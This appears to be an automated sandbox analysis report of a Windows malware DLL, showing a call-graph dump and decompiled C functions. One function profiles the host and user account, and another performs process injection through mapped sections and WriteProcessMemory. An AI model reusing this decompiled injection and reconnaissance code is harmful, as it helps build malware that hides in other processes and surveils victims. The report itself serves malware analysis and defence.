12172->12173 12174 1000861a 2 API calls 12173->12174 12175 10004a03 12174->12175 12175->12061 12290 1000b700 12176->12290 12178 10002ca8 12179 10002cb4 12178->12179 12180 10002d29 12178->12180 12181 1000109a HeapAlloc 12179->12181 12182 10002ba4 4 API calls 12180->12182 12183 10002cbe 12181->12183 12184 10002d3b 12182->12184 12189 10002ce8 12183->12189 12190 10002cdf 12183->12190 12185 10002d40 12184->12185 12186 10002d8a 12184->12186 12306 1000b012 memset memset 12185->12306 12187 10002c64 3 API calls 12186->12187 12198 10002d26 12187->12198 12194 1000109a HeapAlloc 12189->12194 12299 10002c64 12190->12299 12191 10002d4b 12193 1000109a HeapAlloc 12191->12193 12196 10002d55 12193->12196 12197 10002cf2 12194->12197 12195 10002ce4 12201 100085d5 2 API calls 12195->12201 12199 100092e5 2 API calls 12196->12199 12200 100092e5 2 API calls 12197->12200 12202 10002dc1 12198->12202 12203 10002d9f CreateDirectoryW 12198->12203 12204 10002d7a 12199->12204 12205 10002d0f 12200->12205 12201->12198 12202->12066 12202->12067 12207 10002dab 12203->12207 12208 100085d5 2 API calls 12204->12208 12206 100085d5 2 API calls 12205->12206 12206->12195 12207->12202 12209 1000861a 2 API calls 12207->12209 12208->12198 12209->12202 12211 1000c00b 12210->12211 12213 10004b42 12210->12213 12212 100095e1 HeapAlloc 12211->12212 12211->12213 12216 1000c054 12212->12216 12213->12086 12214 1000c0f2 12215 100085d5 2 API calls 12214->12215 12215->12213 12216->12214 12311 10008604 HeapAlloc 12216->12311 12218 1000c0e8 12218->12214 12219 1000c0f9 12218->12219 12220 100095e1 HeapAlloc 12219->12220 12221 1000c103 12220->12221 12222 10009640 2 API calls 12221->12222 12223 1000c11b 12222->12223 12224 1000c1ab 12223->12224 12225 1000c170 12223->12225 12226 1000c131 12223->12226 12228 1000861a 2 API calls 12224->12228 12229 10009640 2 API calls 12225->12229 12227 10009640 2 API calls 12226->12227 12230 1000c149 12227->12230 12231 1000c1d1 12228->12231 12232 1000c16b 12229->12232 12233 10009640 2 API calls 
12230->12233 12234 100085d5 2 API calls 12231->12234 12237 1000a911 2 API calls 12232->12237 12233->12232 12235 1000c1da 12234->12235 12236 100085d5 2 API calls 12235->12236 12236->12213 12237->12224 12239 100095e1 HeapAlloc 12238->12239 12240 1000e29c 12239->12240 12241 1000bfec 6 API calls 12240->12241 12242 1000e2b4 12241->12242 12243 100085d5 2 API calls 12242->12243 12244 1000e2bd 12243->12244 12244->12068 12246 1000a86d 5 API calls 12245->12246 12247 1000c2a4 12246->12247 12248 100095c7 HeapAlloc 12247->12248 12249 1000c2ae 12248->12249 12250 10009292 2 API calls 12249->12250 12251 1000c2bd 12250->12251 12252 100085c2 2 API calls 12251->12252 12253 10004b6e 12252->12253 12253->12084 12253->12085 12255 10009f55 12254->12255 12255->12255 12256 1000a0ab 4 API calls 12255->12256 12257 10004c16 12256->12257 12257->12093 12259 1000a46a 12258->12259 12263 1000a400 12258->12263 12259->12097 12261 10009749 2 API calls 12261->12263 12262 1000a424 GetLastError 12262->12263 12263->12259 12263->12261 12263->12262 12264 1000a0ab 4 API calls 12263->12264 12265 10009f48 4 API calls 12263->12265 12312 10009ed0 12263->12312 12264->12263 12265->12263 12270 10005564 12266->12270 12267 10005626 12267->12106 12268 1000a6a9 3 API calls 12268->12270 12269 1000861a 2 API calls 12269->12270 12270->12267 12270->12268 12270->12269 12272 100052d6 12271->12272 12273 100052ef 12271->12273 12317 10008604 HeapAlloc 12272->12317 12275 10008698 3 API calls 12273->12275 12276 100052e0 12275->12276 12277 1000b88a 4 API calls 12276->12277 12282 10004cf8 12276->12282 12278 10005344 12277->12278 12279 100122d3 _ftol2_sse 12278->12279 12280 10005377 12279->12280 12281 1000902d _ftol2_sse 12280->12281 12281->12282 12282->12066 12282->12110 12282->12111 12284 1000bf64 12283->12284 12287 10002c08 12284->12287 12289 10008604 HeapAlloc 12284->12289 12286 1000bf94 12286->12287 12288 1000861a 2 API calls 12286->12288 12287->12161 12288->12287 12289->12286 12291 100095c7 HeapAlloc 12290->12291 12292 
1000b71a 12291->12292 12293 1001242d _ftol2_sse 12292->12293 12296 1000b74f 12293->12296 12294 1000b793 12295 100085c2 2 API calls 12294->12295 12297 1000b7a1 12295->12297 12296->12294 12298 1001242d _ftol2_sse 12296->12298 12297->12178 12298->12296 12300 1000109a HeapAlloc 12299->12300 12301 10002c73 12300->12301 12302 100091e3 HeapAlloc 12301->12302 12303 10002c7d 12302->12303 12304 100085d5 2 API calls 12303->12304 12305 10002c88 12304->12305 12305->12195 12307 1000b062 12306->12307 12308 1000b946 5 API calls 12307->12308 12309 1000b067 12308->12309 12310 1000b0c5 lstrcpynW 12309->12310 12310->12191 12311->12218 12313 10009f95 3 API calls 12312->12313 12314 10009ee9 12313->12314 12315 10009eff 12314->12315 12316 1000861a 2 API calls 12314->12316 12315->12263 12316->12315 12317->12276 12318->12117 12320 10004928 12319->12320 12321 10004995 12320->12321 12322 10004a0b 37 API calls 12320->12322 12321->12117 12324 10004948 12322->12324 12323 10004986 12337 100047ca 12323->12337 12324->12321 12324->12323 12327 1000ad44 12324->12327 12328 1000ad65 12327->12328 12333 1000ad5e 12327->12333 12329 1000ad71 GetLastError 12328->12329 12330 1000ad79 12328->12330 12329->12333 12331 1000b998 6 API calls 12330->12331 12332 1000ad8b 12331->12332 12332->12333 12334 1000adea 12332->12334 12335 1000ada2 memset 12332->12335 12333->12324 12336 1000861a 2 API calls 12334->12336 12335->12334 12336->12333 12338 100060df 4 API calls 12337->12338 12339 100047ef 12338->12339 12340 100047fb 12339->12340 12341 1000109a HeapAlloc 12339->12341 12340->12321 12342 1000481a 12341->12342 12343 100092e5 2 API calls 12342->12343 12344 1000482c 12343->12344 12345 100085d5 2 API calls 12344->12345 12346 1000483a 12345->12346 12347 10002ba4 4 API calls 12346->12347 12348 1000484c 12347->12348 12363 100048d8 12348->12363 12364 10006144 12348->12364 12350 1000861a 2 API calls 12351 100048e5 12350->12351 12353 1000861a 2 API calls 12351->12353 12353->12340 12354 100095e1 HeapAlloc 12355 10004878 
12354->12355 12356 100092e5 2 API calls 12355->12356 12357 1000488f 12356->12357 12358 100085d5 2 API calls 12357->12358 12359 1000489d 12358->12359 12360 100048be 12359->12360 12362 10006144 7 API calls 12359->12362 12361 1000861a 2 API calls 12360->12361 12361->12363 12362->12360 12363->12350 12373 10008604 HeapAlloc 12364->12373 12366 10006154 12367 1000902d _ftol2_sse 12366->12367 12372 10004869 12366->12372 12368 1000617c 12367->12368 12374 1000c263 12368->12374 12371 1000861a 2 API calls 12371->12372 12372->12354 12372->12363 12373->12366 12375 1000c274 12374->12375 12376 1000bfec 6 API calls 12375->12376 12377 1000618b 12376->12377 12377->12371 12379 1000f883 12378->12379 12380 1000f7fe 12378->12380 12382 1000109a HeapAlloc 12379->12382 12381 1000109a HeapAlloc 12380->12381 12383 1000f809 12381->12383 12384 1000f88d 12382->12384 12406 10008604 HeapAlloc 12383->12406 12386 10006144 7 API calls 12384->12386 12387 1000f89e 12386->12387 12390 100085d5 2 API calls 12387->12390 12388 1000f817 12389 1001242d _ftol2_sse 12388->12389 12391 1000f833 12389->12391 12392 1000f8a9 12390->12392 12393 10009640 2 API calls 12391->12393 12394 1000f8b5 12392->12394 12396 1000f9bf 4 API calls 12392->12396 12395 1000f845 12393->12395 12398 1000861a 2 API calls 12394->12398 12397 1000a911 2 API calls 12395->12397 12396->12394 12399 1000f855 12397->12399 12405 1000f87e 12398->12405 12400 100085d5 2 API calls 12399->12400 12401 1000f868 12400->12401 12407 10009f2f 12401->12407 12404 1000861a 2 API calls 12404->12405 12405->12135 12406->12388 12410 10009f06 12407->12410 12411 1000a0ab 4 API calls 12410->12411 12412 10009f2a 12411->12412 12412->12404 12413->12141 12438 10008604 HeapAlloc 12414->12438 12416 100061ef 12417 10006360 12416->12417 12439 10008604 HeapAlloc 12416->12439 12417->11659 12419 1000626f 12420 1000861a 2 API calls 12419->12420 12421 10006352 12420->12421 12422 1000861a 2 API calls 12421->12422 12422->12417 12423 1000628d memset memset 12424 10006209 12423->12424 
12424->12417 12424->12419 12424->12423 12425 1000b1b1 10 API calls 12424->12425 12425->12424 12427 10009f95 3 API calls 12426->12427 12429 10009e87 12427->12429 12428 10009e9e 12428->11674 12431 10008604 HeapAlloc 12428->12431 12429->12428 12430 1000861a 2 API calls 12429->12430 12430->12428 12431->11664 12433 1000a245 12432->12433 12434 10009b0e HeapAlloc 12433->12434 12436 1000a275 12434->12436 12435 1000a2da 12435->11671 12436->12435 12437 1000861a 2 API calls 12436->12437 12437->12435 12438->12416 12439->12424 12441 10009e66 3 API calls 12440->12441 12442 10005642 12441->12442 12443 1000980c GetSystemTimeAsFileTime 12442->12443 12445 100056c0 12442->12445 12444 1000565b 12443->12444 12446 10009f06 4 API calls 12444->12446 12445->11312 12447 1000566f 12446->12447 12448 10009f06 4 API calls 12447->12448 12449 10005685 12448->12449 12476 1000e4c1 12449->12476 12452 1000a86d 5 API calls 12453 100056a4 12452->12453 12453->12445 12454 100056e9 12453->12454 12483 10008604 HeapAlloc 12453->12483 12484 1000153b CreateMutexA 12454->12484 12457 10005707 12499 100098ee 12457->12499 12459 10005715 12511 10003017 12459->12511 12467 10005758 12560 10003d34 12467->12560 12469 1000980c GetSystemTimeAsFileTime 12471 1000572b 12469->12471 12471->12467 12471->12469 12552 1000279b 12471->12552 12477 1000e1bc 6 API calls 12476->12477 12478 1000e4d3 12477->12478 12479 1000e1bc 6 API calls 12478->12479 12480 1000e4ec 12479->12480 12576 1000e450 12480->12576 12482 1000568d 12482->12452 12483->12454 12485 10001558 CreateMutexA 12484->12485 12495 100015ad 12484->12495 12486 1000156e 12485->12486 12485->12495 12487 10001080 HeapAlloc 12486->12487 12488 10001578 12487->12488 12489 100091a6 HeapAlloc 12488->12489 12488->12495 12490 1000158c 12489->12490 12491 100085c2 2 API calls 12490->12491 12492 10001599 12491->12492 12590 10008604 HeapAlloc 12492->12590 12494 100015a3 12494->12495 12591 10008604 HeapAlloc 12494->12591 12495->12457 12497 100015c4 12497->12495 12498 1000e1bc 6 API calls 
12497->12498 12498->12495 12500 1000990c 12499->12500 12501 1000996c 12500->12501 12509 10009910 12500->12509 12592 1000984a 12500->12592 12506 1000997d 12501->12506 12596 10008604 HeapAlloc 12501->12596 12503 1000a471 2 API calls 12505 100099e2 12503->12505 12507 10009a56 SetThreadPriority 12505->12507 12508 10009a1f 12505->12508 12506->12503 12506->12509 12507->12509 12508->12509 12510 1000861a 2 API calls 12508->12510 12509->12459 12510->12509 12512 10003025 12511->12512 12513 1000302a 12511->12513 12597 1000bb20 12512->12597 12515 100031c2 12513->12515 12516 1000c292 6 API calls 12515->12516 12517 100031dd 12516->12517 12518 100031e6 12517->12518 12604 10008604 HeapAlloc 12517->12604 12528 100029b1 12518->12528 12520 100031fa 12521 10003204 12520->12521 12605 1000bd10 12520->12605 12523 1000861a 2 API calls 12521->12523 12523->12518 12527 100098ee 6 API calls 12527->12521 12529 10009e66 3 API calls 12528->12529 12530 100029cf 12529->12530 12614 100028fb 12530->12614 12533 100028fb 3 API calls 12534 100029f8 12533->12534 12618 10009ea5 12534->12618 12537 10002a4c 12545 10003bb2 12537->12545 12538 100093be HeapAlloc 12539 10002a1b 12538->12539 12540 10002a37 12539->12540 12621 10002a53 12539->12621 12542 100094b7 2 API calls 12540->12542 12543 10002a42 12542->12543 12544 1000861a 2 API calls 12543->12544 12544->12537 12629 10004145 12545->12629 12547 10003c42 12668 10003821 12547->12668 12550 10003be0 12550->12471 12551 10003bd5 12551->12547 12551->12550 12649 100038f9 12551->12649 12553 100028b3 12552->12553 12557 100027d3 12552->12557 12553->12471 12554 100028aa 12554->12553 12716 10002aea 12554->12716 12557->12553 12557->12554 12558 1000980c GetSystemTimeAsFileTime 12557->12558 12711 10009e1f 12557->12711 12726 10001da0 12557->12726 12558->12557 12565 10003d42 12560->12565 12561 10003d72 12562 1000861a 2 API calls 12561->12562 12564 10003d85 12562->12564 12566 10009a8e 12564->12566 12565->12561 12731 10003c54 12565->12731 12569 10009a94 12566->12569 12567 
10009aea 12568 1000861a 2 API calls 12567->12568 12570 10005762 12568->12570 12569->12567 12571 1000984a 2 API calls 12569->12571 12572 100034cb 12570->12572 12571->12569 12574 100034d4 12572->12574 12573 100034f9 12573->12445 12574->12573 12575 1000861a 2 API calls 12574->12575 12575->12573 12577 1000e49a 12576->12577 12578 1000e45e 12576->12578 12580 100095c7 HeapAlloc 12577->12580 12589 10008604 HeapAlloc 12578->12589 12581 1000e4a4 12580->12581 12583 100091a6 HeapAlloc 12581->12583 12582 1000e46f 12586 1000e4bd 12582->12586 12587 1000861a 2 API calls 12582->12587 12584 1000e4b0 12583->12584 12585 100085c2 2 API calls 12584->12585 12585->12586 12586->12482 12588 1000e493 12587->12588 12588->12482 12589->12582 12590->12494 12591->12497 12593 10009854 12592->12593 12594 1000861a 2 API calls 12593->12594 12595 10009879 12593->12595 12594->12595 12595->12500 12596->12506 12598 1000bb37 12597->12598 12599 1000bb56 12598->12599 12600 100095e1 HeapAlloc 12598->12600 12599->12513 12601 1000bb65 lstrcmpiW 12600->12601 12602 1000bb7b 12601->12602 12603 100085d5 2 API calls 12602->12603 12603->12599 12604->12520 12608 1000bd5e 12605->12608 12606 10003210 12606->12521 12609 1000bc7a 12606->12609 12607 1000bdfe LocalAlloc 12607->12606 12608->12606 12608->12607 12610 100095e1 HeapAlloc 12609->12610 12613 1000bca0 12610->12613 12611 100085d5 2 API calls 12612 10003268 12611->12612 12612->12527 12613->12611 12615 1000291c 12614->12615 12616 10002905 12614->12616 12615->12533 12617 10008698 3 API calls 12616->12617 12617->12615 12619 10009f95 3 API calls 12618->12619 12620 10002a03 12619->12620 12620->12537 12620->12538 12622 10002a5f 12621->12622 12623 10002a65 12622->12623 12624 10002a6a atol 12622->12624 12623->12539 12625 10002a81 12624->12625 12625->12623 12626 10009749 2 API calls 12625->12626 12627 10002a97 12626->12627 12628 10009749 2 API calls 12627->12628 12628->12623 12674 1000378c 12629->12674 12632 1000896f 4 API calls 12633 1000418c 12632->12633 12634 10008a90 3 

        Executed Functions

        Control-flow Graph

        C-Code - Quality: 91%
        			E1000D01F(void* __fp0) {
        				long _v8;
        				long _v12;
        				union _SID_NAME_USE _v16;
        				struct _SYSTEM_INFO _v52;
        				char _v180;
        				short _v692;
        				char _v704;
        				char _v2680;
        				void* __esi;
        				struct _OSVERSIONINFOA* _t81;
        				intOrPtr _t83;
        				void* _t84;
        				long _t86;
        				void** _t88;
        				intOrPtr _t90;
        				intOrPtr _t91;
        				intOrPtr _t92;
        				intOrPtr _t97;
        				void* _t98;
        				intOrPtr _t103;
        				char* _t105;
        				void* _t108;
        				intOrPtr _t111;
        				long _t115;
        				signed int _t117;
        				long _t119;
        				intOrPtr _t124;
        				intOrPtr _t127;
        				intOrPtr _t130;
        				intOrPtr _t134;
        				intOrPtr _t145;
        				intOrPtr _t147;
        				intOrPtr _t149;
        				intOrPtr _t152;
        				intOrPtr _t154;
        				signed int _t159;
        				struct HINSTANCE__* _t162;
        				short* _t164;
        				intOrPtr _t167;
        				WCHAR* _t168;
        				char* _t169;
        				intOrPtr _t181;
        				intOrPtr _t200;
        				void* _t215;
        				long _t218;
        				void* _t219;
        				char* _t220;
        				struct _OSVERSIONINFOA* _t222;
        				void* _t223;
        				int* _t224;
        				void* _t241;
        
        				_t241 = __fp0;
        				_t162 =  *0x1001e69c; // 0x10000000
        				_t81 = E10008604(0x1ac4);
        				_t222 = _t81;
        				if(_t222 == 0) {
        					return _t81;
        				}
        				 *((intOrPtr*)(_t222 + 0x1640)) = GetCurrentProcessId();
        				_t83 =  *0x1001e684; // 0x219faa0
        				_t84 =  *((intOrPtr*)(_t83 + 0xa0))(_t215);
        				_t3 = _t222 + 0x648; // 0x648
        				E10012301( *((intOrPtr*)(_t222 + 0x1640)) + _t84, _t3);
        				_t5 = _t222 + 0x1644; // 0x1644
        				_t216 = _t5;
        				_t86 = GetModuleFileNameW(0, _t5, 0x105);
        				_t227 = _t86;
        				if(_t86 != 0) {
        					 *((intOrPtr*)(_t222 + 0x1854)) = E10008FBE(_t216, _t227);
        				}
        				GetCurrentProcess();
        				_t88 = E1000BA05(); // executed
        				 *(_t222 + 0x110) = _t88;
        				_t178 =  *_t88;
        				if(E1000BB8D( *_t88) == 0) {
        					_t90 = E1000BA62(_t178, _t222); // executed
        					__eflags = _t90;
        					_t181 = (0 | _t90 > 0x00000000) + 1;
        					__eflags = _t181;
        					 *((intOrPtr*)(_t222 + 0x214)) = _t181;
        				} else {
        					 *((intOrPtr*)(_t222 + 0x214)) = 3;
        				}
        				_t12 = _t222 + 0x220; // 0x220, executed
        				_t91 = E1000E3F1(_t12); // executed
        				 *((intOrPtr*)(_t222 + 0x218)) = _t91;
        				_t92 = E1000E3B6(_t12); // executed
        				 *((intOrPtr*)(_t222 + 0x21c)) = _t92;
        				 *(_t222 + 0x224) = _t162;
        				_v12 = 0x80;
        				_v8 = 0x100;
        				_t22 = _t222 + 0x114; // 0x114
        				if(LookupAccountSidW(0,  *( *(_t222 + 0x110)), _t22,  &_v12,  &_v692,  &_v8,  &_v16) == 0) {
        					GetLastError();
        				}
        				_t97 =  *0x1001e694; // 0x219fbf8
        				_t98 =  *((intOrPtr*)(_t97 + 0x3c))(0x1000);
        				_t26 = _t222 + 0x228; // 0x228
        				 *(_t222 + 0x1850) = 0 | _t98 > 0x00000000;
        				GetModuleFileNameW( *(_t222 + 0x224), _t26, 0x105);
        				GetLastError();
        				_t31 = _t222 + 0x228; // 0x228
        				 *((intOrPtr*)(_t222 + 0x434)) = E10008FBE(_t31, _t98);
        				_t34 = _t222 + 0x114; // 0x114, executed
        				_t103 = E1000B7A8(_t34,  &_v692);
        				_t35 = _t222 + 0xb0; // 0xb0
        				 *((intOrPtr*)(_t222 + 0xac)) = _t103;
        				_push(_t35);
        				E1000B67D(_t103, _t35, _t98, _t241);
        				_t37 = _t222 + 0xb0; // 0xb0
        				_t105 = _t37;
        				_t38 = _t222 + 0xd0; // 0xd0
        				_t164 = _t38;
        				if(_t105 != 0) {
        					_t159 = MultiByteToWideChar(0, 0, _t105, 0xffffffff, _t164, 0x20);
        					if(_t159 > 0) {
        						_t164[_t159] = 0;
        					}
        				}
        				_t41 = _t222 + 0x438; // 0x438
        				_t42 = _t222 + 0x228; // 0x228
        				E10008FD8(_t42, _t41);
        				_t43 = _t222 + 0xb0; // 0xb0
        				_t108 = E1000D400(_t43, E1000C379(_t43), 0);
        				_t44 = _t222 + 0x100c; // 0x100c
        				E1000B88A(_t108, _t44, _t241);
        				_t199 = GetCurrentProcess(); // executed
        				_t111 = E1000BBDF(_t110); // executed
        				 *((intOrPtr*)(_t222 + 0x101c)) = _t111;
        				memset(_t222, 0, 0x9c);
        				_t224 = _t223 + 0xc;
        				_t222->dwOSVersionInfoSize = 0x9c;
        				GetVersionExA(_t222);
        				_t167 =  *0x1001e684; // 0x219faa0
        				_t115 = 0;
        				_v8 = 0;
        				if( *((intOrPtr*)(_t167 + 0x6c)) != 0) {
        					 *((intOrPtr*)(_t167 + 0x6c))(GetCurrentProcess(),  &_v8);
        					_t115 = _v8;
        				}
        				 *((intOrPtr*)(_t222 + 0xa8)) = _t115;
        				if(_t115 == 0) {
        					GetSystemInfo( &_v52);
        					_t117 = _v52.dwOemId & 0x0000ffff;
        				} else {
        					_t117 = 9;
        				}
        				_t54 = _t222 + 0x1020; // 0x1020
        				_t168 = _t54;
        				 *(_t222 + 0x9c) = _t117;
        				GetWindowsDirectoryW(_t168, 0x104);
        				_t119 = E100095E1(_t199, 0x10c);
        				_t200 =  *0x1001e684; // 0x219faa0
        				_t218 = _t119;
        				 *_t224 = 0x104;
        				_push( &_v704);
        				_push(_t218);
        				_v8 = _t218;
        				if( *((intOrPtr*)(_t200 + 0xe0))() == 0) {
        					_t154 =  *0x1001e684; // 0x219faa0
        					 *((intOrPtr*)(_t154 + 0xfc))(_t218, _t168);
        				}
        				E100085D5( &_v8);
        				_t124 =  *0x1001e684; // 0x219faa0
        				_t61 = _t222 + 0x1434; // 0x1434
        				_t219 = _t61;
        				 *_t224 = 0x209;
        				_push(_t219);
        				_push(L"USERPROFILE");
        				if( *((intOrPtr*)(_t124 + 0xe0))() == 0) {
        					E10009640(_t219, 0x105, L"%s\\%s", _t168);
        					_t152 =  *0x1001e684; // 0x219faa0
        					_t224 =  &(_t224[5]);
        					 *((intOrPtr*)(_t152 + 0xfc))(L"USERPROFILE", _t219, "TEMP");
        				}
        				_push(0x20a);
        				_t64 = _t222 + 0x122a; // 0x122a
        				_t169 = L"TEMP";
        				_t127 =  *0x1001e684; // 0x219faa0
        				_push(_t169);
        				if( *((intOrPtr*)(_t127 + 0xe0))() == 0) {
        					_t149 =  *0x1001e684; // 0x219faa0
        					 *((intOrPtr*)(_t149 + 0xfc))(_t169, _t219);
        				}
        				_push(0x40);
        				_t220 = L"SystemDrive";
        				_push( &_v180);
        				_t130 =  *0x1001e684; // 0x219faa0
        				_push(_t220);
        				if( *((intOrPtr*)(_t130 + 0xe0))() == 0) {
        					_t147 =  *0x1001e684; // 0x219faa0
        					 *((intOrPtr*)(_t147 + 0xfc))(_t220, L"C:");
        				}
        				_v8 = 0x7f;
        				_t72 = _t222 + 0x199c; // 0x199c
        				_t134 =  *0x1001e684; // 0x219faa0
        				 *((intOrPtr*)(_t134 + 0xb0))(_t72,  &_v8);
        				_t75 = _t222 + 0x100c; // 0x100c
        				E10012301(E1000D400(_t75, E1000C379(_t75), 0),  &_v2680);
        				_t76 = _t222 + 0x1858; // 0x1858
        				E100122D3( &_v2680, _t76, 0x20);
        				_t79 = _t222 + 0x1878; // 0x1878
        				E1000902D(1, _t79, 0x14, 0x1e,  &_v2680);
        				_t145 = E1000CD33(_t79); // executed
        				 *((intOrPtr*)(_t222 + 0x1898)) = _t145;
        				return _t222;
        			}

        APIs
          • Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612
        • GetCurrentProcessId.KERNEL32 ref: 1000D046
        • GetModuleFileNameW.KERNEL32(00000000,00001644,00000105), ref: 1000D082
        • GetCurrentProcess.KERNEL32 ref: 1000D09F
        • LookupAccountSidW.ADVAPI32(00000000,?,00000114,00000080,?,?,?), ref: 1000D131
        • GetLastError.KERNEL32 ref: 1000D13E
        • GetModuleFileNameW.KERNEL32(?,00000228,00000105), ref: 1000D16C
        • GetLastError.KERNEL32 ref: 1000D172
        • MultiByteToWideChar.KERNEL32(00000000,00000000,000000B0,000000FF,000000D0,00000020), ref: 1000D1C7
        • GetCurrentProcess.KERNEL32 ref: 1000D20E
          • Part of subcall function 1000BA62: CloseHandle.KERNEL32(?,00000000,74EC17D9,10000000), ref: 1000BB06
        • memset.MSVCRT ref: 1000D229
        • GetVersionExA.KERNEL32(00000000), ref: 1000D234
        • GetCurrentProcess.KERNEL32(00000100), ref: 1000D24E
        • IsWow64Process.KERNEL32(00000000), ref: 1000D251
        • GetSystemInfo.KERNEL32(?), ref: 1000D26A
        • GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 1000D287
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp
        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID: Process$Current$ErrorFileLastModuleName$AccountAllocByteCharCloseDirectoryHandleHeapInfoLookupMultiSystemVersionWideWindowsWow64memset
        • String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
        • API String ID: 2155830292-2706916422
        • Opcode ID: b5dd94d2bbba0da44d3b5b8615bbbb5f356fccea26f3f649cc03eb97a5baf4da
        • Instruction ID: b43297c2b7e84521e640d7514395b2e770dddaaf3bf4c430bd1fb4440b0adffa
        • Opcode Fuzzy Hash: b5dd94d2bbba0da44d3b5b8615bbbb5f356fccea26f3f649cc03eb97a5baf4da
        • Instruction Fuzzy Hash: 7AB14875600709ABE714EB70CC89FEE77E8EF18380F01486EF55AD7195EB70AA448B21
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        C-Code - Quality: 86%
        			E1000C6C0(void* __ecx, intOrPtr __edx) {
        				void* _v8;
        				void* _v12;
        				void* _v16;
        				void* _v20;
        				long _v24;
        				long _v28;
        				void* _v32;
        				intOrPtr _v36;
        				long _v40;
        				void* _v44;
        				char _v56;
        				char _v72;
        				struct _WNDCLASSEXA _v120;
        				void* _t69;
        				intOrPtr _t75;
        				struct HWND__* _t106;
        				intOrPtr* _t113;
        				struct _EXCEPTION_RECORD _t116;
        				void* _t126;
        				void* _t131;
        				intOrPtr _t134;
        				void* _t140;
        				void* _t141;
        
        				_t69 =  *0x1001e688; // 0x2120590
        				_t126 = __ecx;
        				_t134 = __edx;
        				_t116 = 0;
        				_v36 = __edx;
        				_v16 = 0;
        				_v44 = 0;
        				_v40 = 0;
        				_v12 = 0;
        				_v8 = 0;
        				_v24 = 0;
        				_v20 = __ecx;
        				if(( *(_t69 + 0x1898) & 0x00000040) != 0) {
        					E1000E23E(0x1f4);
        					_t116 = 0;
        				}
        				_t113 =  *((intOrPtr*)(_t134 + 0x3c)) + _t134;
        				_v28 = _t116;
        				if( *_t113 != 0x4550) {
        					L12:
        					if(_v8 != 0) {
        						_t75 =  *0x1001e780; // 0x219fbc8
        						 *((intOrPtr*)(_t75 + 0x10))(_t126, _v8);
        						_v8 = _v8 & 0x00000000;
        					}
        					L14:
        					if(_v12 != 0) {
        						NtUnmapViewOfSection(GetCurrentProcess(), _v12);
        					}
        					if(_v16 != 0) {
        						NtClose(_v16);
        					}
        					return _v8;
        				}
        				_v44 =  *((intOrPtr*)(_t113 + 0x50));
        				if(NtCreateSection( &_v16, 0xe, _t116,  &_v44, 0x40, 0x8000000, _t116) < 0) {
        					goto L12;
        				}
        				_v120.style = 0xb;
        				_v120.cbSize = 0x30;
        				_v120.lpszClassName =  &_v56;
        				asm("movsd");
        				_v120.lpfnWndProc = DefWindowProcA;
        				asm("movsd");
        				asm("movsd");
        				asm("movsb");
        				asm("movsd");
        				asm("movsd");
        				asm("movsw");
        				asm("movsb");
        				_v120.cbWndExtra = 0;
        				_v120.lpszMenuName = 0;
        				_v120.cbClsExtra = 0;
        				_v120.hInstance = 0;
        				if(RegisterClassExA( &_v120) != 0) {
        					_t106 = CreateWindowExA(0,  &_v56,  &_v72, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, 0, 0); // executed
        					if(_t106 != 0) {
        						DestroyWindow(_t106); // executed
        						UnregisterClassA( &_v56, 0);
        					}
        				}
        				if(NtMapViewOfSection(_v16, GetCurrentProcess(),  &_v12, 0, 0, 0,  &_v24, 2, 0, 0x40) < 0) {
        					_t126 = _v20;
        					goto L12;
        				} else {
        					_t126 = _v20;
        					if(NtMapViewOfSection(_v16, _t126,  &_v8, 0, 0, 0,  &_v24, 2, 0, 0x40) < 0) {
        						goto L12;
        					}
        					_t140 = E10008669( *0x1001e688, 0x1ac4);
        					_v32 = _t140;
        					if(_t140 == 0) {
        						goto L12;
        					}
        					 *((intOrPtr*)(_t140 + 0x224)) = _v8;
        					_t131 = VirtualAllocEx(_t126, 0, 0x1ac4, 0x1000, 4);
        					WriteProcessMemory(_v20, _t131, _t140, 0x1ac4,  &_v28);
        					E1000861A( &_v32, 0x1ac4);
        					_t141 =  *0x1001e688; // 0x2120590
        					 *0x1001e688 = _t131;
        					E100086E1(_v12, _v36,  *((intOrPtr*)(_t113 + 0x50)));
        					E1000C63F(_v12, _v8, _v36);
        					 *0x1001e688 = _t141;
        					goto L14;
        				}
        			}

        APIs
        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,10005CEC), ref: 1000C733
        • RegisterClassExA.USER32 ref: 1000C785
        • CreateWindowExA.USER32 ref: 1000C7B0
        • DestroyWindow.USER32 ref: 1000C7BB
        • UnregisterClassA.USER32(?,00000000), ref: 1000C7C6
        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 1000C7E2
        • NtMapViewOfSection.NTDLL(?,00000000), ref: 1000C7EC
        • NtMapViewOfSection.NTDLL(?,1000CBA0,00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 1000C813
        • VirtualAllocEx.KERNEL32(1000CBA0,00000000,00001AC4,00001000,00000004), ref: 1000C856
        • WriteProcessMemory.KERNEL32(1000CBA0,00000000,00000000,00001AC4,?), ref: 1000C86F
          • Part of subcall function 1000861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 10008660
        • GetCurrentProcess.KERNEL32(00000000), ref: 1000C8DB
        • NtUnmapViewOfSection.NTDLL(00000000), ref: 1000C8E2
        • NtClose.NTDLL(00000000), ref: 1000C8F5
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp
        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp
        Joe Sandbox IDA Plugin
